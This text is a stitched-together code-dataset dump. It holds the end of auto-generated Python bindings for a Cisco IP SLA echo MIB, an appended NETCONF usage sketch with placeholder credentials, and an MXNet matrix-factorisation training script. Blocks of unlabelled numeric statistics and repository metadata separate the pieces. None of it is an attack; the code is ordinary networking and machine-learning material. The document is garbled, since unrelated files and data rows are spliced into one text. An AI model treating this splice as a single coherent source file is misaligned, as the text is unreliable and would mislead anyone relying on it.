self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, [], name, value)
class CipslaUdpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA UDP echo template.
.. attribute:: cipslaudpechotmplname (key)
A string which specifies the UDP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaudpechotmpldescription
A string which provides description to the UDP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaudpechotmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslaudpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaUdpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaudpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaudpechotmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslaudpechotmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaudpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaudpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' RTT request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 4..1500
**units**\: octets
.. attribute:: cipslaudpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaudpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing Table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaudpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaUdpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaudpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaudpechotmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaUdpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaUdpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaudpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaUdpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaUdpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter>`
.. attribute:: cipslaudpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaudpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaUdpEchoTmplStatsNumDistBuckets will be kept. The last cipslaUdpEchoTmplStatsNumDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaudpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaUdpEchoTmplDistBuckets = 5 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaUdpEchoTmplDistBuckets = 1 buckets cipslaUdpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaUdpEchoTmplDistInterval does not apply when cipslaUdpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaudpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaudpechotmplrowstatus
The status of the conceptual UDP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaUdpEchoTmplEntry"
self.yang_parent_name = "cipslaUdpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaudpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaudpechotmplname', (YLeaf(YType.str, 'cipslaUdpEchoTmplName'), ['str'])),
('cipslaudpechotmpldescription', (YLeaf(YType.str, 'cipslaUdpEchoTmplDescription'), ['str'])),
('cipslaudpechotmplcontrolenable', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplControlEnable'), ['bool'])),
('cipslaudpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaudpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaUdpEchoTmplSrcAddr'), ['str'])),
('cipslaudpechotmplsrcport', (YLeaf(YType.uint16, 'cipslaUdpEchoTmplSrcPort'), ['int'])),
('cipslaudpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTimeOut'), ['int'])),
('cipslaudpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaUdpEchoTmplVerifyData'), ['bool'])),
('cipslaudpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplReqDataSize'), ['int'])),
('cipslaudpechotmpltos', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplTOS'), ['int'])),
('cipslaudpechotmplvrfname', (YLeaf(YType.str, 'cipslaUdpEchoTmplVrfName'), ['str'])),
('cipslaudpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplThreshold'), ['int'])),
('cipslaudpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistLives'), ['int'])),
('cipslaudpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplHistBuckets'), ['int'])),
('cipslaudpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter')])),
('cipslaudpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplStatsHours'), ['int'])),
('cipslaudpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistBuckets'), ['int'])),
('cipslaudpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaUdpEchoTmplDistInterval'), ['int'])),
('cipslaudpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaudpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaUdpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaudpechotmplname = None
self.cipslaudpechotmpldescription = None
self.cipslaudpechotmplcontrolenable = None
self.cipslaudpechotmplsrcaddrtype = None
self.cipslaudpechotmplsrcaddr = None
self.cipslaudpechotmplsrcport = None
self.cipslaudpechotmpltimeout = None
self.cipslaudpechotmplverifydata = None
self.cipslaudpechotmplreqdatasize = None
self.cipslaudpechotmpltos = None
self.cipslaudpechotmplvrfname = None
self.cipslaudpechotmplthreshold = None
self.cipslaudpechotmplhistlives = None
self.cipslaudpechotmplhistbuckets = None
self.cipslaudpechotmplhistfilter = None
self.cipslaudpechotmplstatshours = None
self.cipslaudpechotmpldistbuckets = None
self.cipslaudpechotmpldistinterval = None
self.cipslaudpechotmplstoragetype = None
self.cipslaudpechotmplrowstatus = None
self._segment_path = lambda: "cipslaUdpEchoTmplEntry" + "[cipslaUdpEchoTmplName='" + str(self.cipslaudpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaUdpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry, ['cipslaudpechotmplname', 'cipslaudpechotmpldescription', 'cipslaudpechotmplcontrolenable', 'cipslaudpechotmplsrcaddrtype', 'cipslaudpechotmplsrcaddr', 'cipslaudpechotmplsrcport', 'cipslaudpechotmpltimeout', 'cipslaudpechotmplverifydata', 'cipslaudpechotmplreqdatasize', 'cipslaudpechotmpltos', 'cipslaudpechotmplvrfname', 'cipslaudpechotmplthreshold', 'cipslaudpechotmplhistlives', 'cipslaudpechotmplhistbuckets', 'cipslaudpechotmplhistfilter', 'cipslaudpechotmplstatshours', 'cipslaudpechotmpldistbuckets', 'cipslaudpechotmpldistinterval', 'cipslaudpechotmplstoragetype', 'cipslaudpechotmplrowstatus'], name, value)
class CipslaUdpEchoTmplHistFilter(Enum):
"""
CipslaUdpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaUdpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaTcpConnTmplTable(Entity):
"""
A table that contains TCP connect template specific definitions.
.. attribute:: cipslatcpconntmplentry
A row entry representing an IPSLA TCP connect template
**type**\: list of :py:class:`CipslaTcpConnTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, self).__init__()
self.yang_name = "cipslaTcpConnTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaTcpConnTmplEntry", ("cipslatcpconntmplentry", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry))])
self._leafs = OrderedDict()
self.cipslatcpconntmplentry = YList(self)
self._segment_path = lambda: "cipslaTcpConnTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable, [], name, value)
class CipslaTcpConnTmplEntry(Entity):
"""
A row entry representing an IPSLA TCP connect template.
.. attribute:: cipslatcpconntmplname (key)
A string which specifies the TCP connect template name
**type**\: str
**length:** 1..64
.. attribute:: cipslatcpconntmpldescription
A string which provides description for the TCP connect template
**type**\: str
**length:** 0..128
.. attribute:: cipslatcpconntmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslatcpconntmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaTcpConnTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslatcpconntmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslatcpconntmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslatcpconntmpltimeout
Specifies the duration to wait for an IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslatcpconntmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslatcpconntmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslatcpconntmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaTcpConnTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslatcpconntmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslatcpconntmplhistbuckets
The maximum number of history buckets to record. This value should be set to the number of operations to keep per lifetime. After cipslaTcpConnTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaTcpConnTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslatcpconntmplhistfilter
Defines a filter for adding RTT results to the history buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times and failed completions are recorded
overThreshold(3) \- the results of completion times over cipslaTcpConnTmplThreshold are recorded
failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaTcpConnTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter>`
.. attribute:: cipslatcpconntmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslatcpconntmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaTcpConnTmplDistBuckets will be kept. The last cipslaTcpConnTmplDistBuckets will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslatcpconntmpldistinterval
The statistical distribution buckets interval.
Distribution Bucket Example\:
cipslaTcpConnTmplDistBuckets = 5 buckets
cipslaTcpConnTmplDistInterval = 10 milliseconds
\| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \|
\| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \|
Odd Example\:
cipslaTcpConnTmplDistBuckets = 1 buckets
cipslaTcpConnTmplDistInterval = 10 milliseconds
\| Bucket 1 \|
\| 0\-Inf ms \|
Thus, this odd example shows that the value of cipslaTcpConnTmplDistInterval does not apply when cipslaTcpConnTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslatcpconntmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslatcpconntmplrowstatus
The status of the conceptual tcp connect control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, self).__init__()
self.yang_name = "cipslaTcpConnTmplEntry"
self.yang_parent_name = "cipslaTcpConnTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslatcpconntmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslatcpconntmplname', (YLeaf(YType.str, 'cipslaTcpConnTmplName'), ['str'])),
('cipslatcpconntmpldescription', (YLeaf(YType.str, 'cipslaTcpConnTmplDescription'), ['str'])),
('cipslatcpconntmplcontrolenable', (YLeaf(YType.boolean, 'cipslaTcpConnTmplControlEnable'), ['bool'])),
('cipslatcpconntmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslatcpconntmplsrcaddr', (YLeaf(YType.str, 'cipslaTcpConnTmplSrcAddr'), ['str'])),
('cipslatcpconntmplsrcport', (YLeaf(YType.uint16, 'cipslaTcpConnTmplSrcPort'), ['int'])),
('cipslatcpconntmpltimeout', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTimeOut'), ['int'])),
('cipslatcpconntmplverifydata', (YLeaf(YType.boolean, 'cipslaTcpConnTmplVerifyData'), ['bool'])),
('cipslatcpconntmpltos', (YLeaf(YType.uint32, 'cipslaTcpConnTmplTOS'), ['int'])),
('cipslatcpconntmplthreshold', (YLeaf(YType.uint32, 'cipslaTcpConnTmplThreshold'), ['int'])),
('cipslatcpconntmplhistlives', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistLives'), ['int'])),
('cipslatcpconntmplhistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplHistBuckets'), ['int'])),
('cipslatcpconntmplhistfilter', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry.CipslaTcpConnTmplHistFilter')])),
('cipslatcpconntmplstatshours', (YLeaf(YType.uint32, 'cipslaTcpConnTmplStatsHours'), ['int'])),
('cipslatcpconntmpldistbuckets', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistBuckets'), ['int'])),
('cipslatcpconntmpldistinterval', (YLeaf(YType.uint32, 'cipslaTcpConnTmplDistInterval'), ['int'])),
('cipslatcpconntmplstoragetype', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslatcpconntmplrowstatus', (YLeaf(YType.enumeration, 'cipslaTcpConnTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslatcpconntmplname = None
self.cipslatcpconntmpldescription = None
self.cipslatcpconntmplcontrolenable = None
self.cipslatcpconntmplsrcaddrtype = None
self.cipslatcpconntmplsrcaddr = None
self.cipslatcpconntmplsrcport = None
self.cipslatcpconntmpltimeout = None
self.cipslatcpconntmplverifydata = None
self.cipslatcpconntmpltos = None
self.cipslatcpconntmplthreshold = None
self.cipslatcpconntmplhistlives = None
self.cipslatcpconntmplhistbuckets = None
self.cipslatcpconntmplhistfilter = None
self.cipslatcpconntmplstatshours = None
self.cipslatcpconntmpldistbuckets = None
self.cipslatcpconntmpldistinterval = None
self.cipslatcpconntmplstoragetype = None
self.cipslatcpconntmplrowstatus = None
self._segment_path = lambda: "cipslaTcpConnTmplEntry" + "[cipslaTcpConnTmplName='" + str(self.cipslatcpconntmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaTcpConnTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable.CipslaTcpConnTmplEntry, ['cipslatcpconntmplname', 'cipslatcpconntmpldescription', 'cipslatcpconntmplcontrolenable', 'cipslatcpconntmplsrcaddrtype', 'cipslatcpconntmplsrcaddr', 'cipslatcpconntmplsrcport', 'cipslatcpconntmpltimeout', 'cipslatcpconntmplverifydata', 'cipslatcpconntmpltos', 'cipslatcpconntmplthreshold', 'cipslatcpconntmplhistlives', 'cipslatcpconntmplhistbuckets', 'cipslatcpconntmplhistfilter', 'cipslatcpconntmplstatshours', 'cipslatcpconntmpldistbuckets', 'cipslatcpconntmpldistinterval', 'cipslatcpconntmplstoragetype', 'cipslatcpconntmplrowstatus'], name, value)
class CipslaTcpConnTmplHistFilter(Enum):
"""
CipslaTcpConnTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaTcpConnTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
def clone_ptr(self):
self._top_entity = CISCOIPSLAECHOMIB()
return self._top_entity
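# ------------------------------------------------------------------
# Illustrative use of the generated bindings above (not part of the
# generated module). A minimal sketch, assuming a ydk-py installation and
# a reachable NETCONF device; the device address, credentials, template
# name and leaf values below are placeholder assumptions.
from ydk.providers import NetconfServiceProvider
from ydk.services import CRUDService
from ydk.models.cisco_ios_xe import CISCO_IPSLA_ECHO_MIB as ipsla_echo

provider = NetconfServiceProvider(address='10.0.0.1', port=830,
                                  username='admin', password='admin')
crud = CRUDService()

# Build one UDP echo template row and attach it to the top-level MIB entity.
mib = ipsla_echo.CISCOIPSLAECHOMIB()
tmpl = ipsla_echo.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry()
tmpl.cipslaudpechotmplname = 'udp-echo-template-1'        # key leaf
tmpl.cipslaudpechotmpldescription = 'example UDP echo template'
tmpl.cipslaudpechotmplthreshold = 5000                    # milliseconds
HistFilter = ipsla_echo.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry.CipslaUdpEchoTmplHistFilter
tmpl.cipslaudpechotmplhistfilter = HistFilter.all         # record all results
mib.cipslaudpechotmpltable.cipslaudpechotmplentry.append(tmpl)

# Push the new row; whether the device accepts MIB-derived config over
# NETCONF depends on the platform, so treat this as a sketch only.
crud.create(provider, mib)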
| 55.527293
| 720
| 0.624855
| 4,459
| 50,863
| 7.037901
| 0.099574
| 0.014531
| 0.017399
| 0.021127
| 0.579186
| 0.565961
| 0.548818
| 0.540724
| 0.524313
| 0.490918
| 0
| 0.012314
| 0.292708
| 50,863
| 915
| 721
| 55.587978
| 0.860014
| 0.463579
| 0
| 0.312268
| 0
| 0
| 0.321841
| 0.284763
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055762
| false
| 0
| 0.018587
| 0
| 0.122677
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
hexsha: fea2c153f85345b8df258b2faf5084ce932ff128 | size: 4,057 | ext: py | lang: Python
max_stars_repo: example/model-parallel/matrix_factorization/train.py | tkameyama/incubator-mxnet | 47b0bdd00e7c5e1c9a448809b02e68c0e4b72e96 | ["Apache-2.0"] | stars: 1 | 2022-01-22T02:29:24.000Z | 2022-01-22T02:29:24.000Z
max_issues_repo: example/model-parallel/matrix_factorization/train.py | tkameyama/incubator-mxnet | 47b0bdd00e7c5e1c9a448809b02e68c0e4b72e96 | ["Apache-2.0"] | issues: null | null | null
max_forks_repo: example/model-parallel/matrix_factorization/train.py | tkameyama/incubator-mxnet | 47b0bdd00e7c5e1c9a448809b02e68c0e4b72e96 | ["Apache-2.0"] | forks: null | null | null
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import logging
import time
import mxnet as mx
import numpy as np
from get_data import get_movielens_iter, get_movielens_data
from model import matrix_fact_model_parallel_net
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description="Run model parallel version of matrix factorization",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-epoch', type=int, default=3,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=256,
help='number of examples per batch')
parser.add_argument('--print-every', type=int, default=100,
help='logging interval')
parser.add_argument('--factor-size', type=int, default=128,
help="the factor size of the embedding operation")
parser.add_argument('--num-gpus', type=int, default=2,
help="number of gpus to use")
MOVIELENS = {
'dataset': 'ml-10m',
'train': './ml-10M100K/r1.train',
'val': './ml-10M100K/r1.test',
'max_user': 71569,
'max_movie': 65135,
}
if __name__ == '__main__':
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
# arg parser
args = parser.parse_args()
logging.info(args)
num_epoch = args.num_epoch
batch_size = args.batch_size
optimizer = 'sgd'
factor_size = args.factor_size
print_every = args.print_every
num_gpus = args.num_gpus
momentum = 0.9
learning_rate = 0.1
# prepare dataset and iterators
max_user = MOVIELENS['max_user']
max_movies = MOVIELENS['max_movie']
get_movielens_data(MOVIELENS['dataset'])
train_iter = get_movielens_iter(MOVIELENS['train'], batch_size)
val_iter = get_movielens_iter(MOVIELENS['val'], batch_size)
# construct the model
net = matrix_fact_model_parallel_net(factor_size, factor_size, max_user, max_movies)
# construct the module
# map the ctx_group attribute to the context assignment
group2ctxs={'dev1':[mx.cpu()]*num_gpus, 'dev2':[mx.gpu(i) for i in range(num_gpus)]}
# Creating a module by passing group2ctxs attribute which maps
# the ctx_group attribute to the context assignment
mod = mx.module.Module(symbol=net, context=[mx.cpu()]*num_gpus, data_names=['user', 'item'],
label_names=['score'], group2ctxs=group2ctxs)
# the initializer used to initialize the parameters
initializer = mx.init.Xavier(factor_type="in", magnitude=2.34)
# the parameters for the optimizer constructor
optimizer_params = {
'learning_rate': learning_rate,
'wd': 1e-4,
'momentum': momentum,
'rescale_grad': 1.0/batch_size}
# use MSE as the metric
metric = mx.gluon.metric.create(['MSE'])
speedometer = mx.callback.Speedometer(batch_size, print_every)
# start training
mod.fit(train_iter,
val_iter,
eval_metric = metric,
num_epoch = num_epoch,
optimizer = optimizer,
optimizer_params = optimizer_params,
initializer = initializer,
batch_end_callback = speedometer)
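# ------------------------------------------------------------------
# For reference: a minimal sketch (not the actual model.py used above) of
# how ctx_group attributes can be attached to parts of a symbol so that the
# group2ctxs mapping above places 'dev1' ops on CPU and 'dev2' ops on GPU.
# The function name and dimensions are placeholder assumptions.
import mxnet as mx

def toy_model_parallel_net(factor_size, num_users, num_items):
    user = mx.sym.Variable('user')
    item = mx.sym.Variable('item')
    score = mx.sym.Variable('score')
    with mx.AttrScope(ctx_group='dev1'):
        # embeddings assigned to the 'dev1' group (mapped to CPU above)
        user_emb = mx.sym.Embedding(data=user, input_dim=num_users,
                                    output_dim=factor_size, name='user_emb')
        item_emb = mx.sym.Embedding(data=item, input_dim=num_items,
                                    output_dim=factor_size, name='item_emb')
    with mx.AttrScope(ctx_group='dev2'):
        # the dot product and regression loss assigned to 'dev2' (GPUs above)
        pred = mx.sym.sum(user_emb * item_emb, axis=1)
        net = mx.sym.LinearRegressionOutput(data=pred, label=score)
    return net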
| 36.881818
| 98
| 0.682031
| 529
| 4,057
| 5.073724
| 0.402647
| 0.023472
| 0.031669
| 0.011923
| 0.07228
| 0.031297
| 0.031297
| 0.031297
| 0
| 0
| 0
| 0.018354
| 0.221099
| 4,057
| 109
| 99
| 37.220183
| 0.831013
| 0.278777
| 0
| 0
| 0
| 0
| 0.15528
| 0.007246
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.107692
| 0
| 0.107692
| 0.046154
| 0
| 0
| 0
| null | 0
| 0
| 0
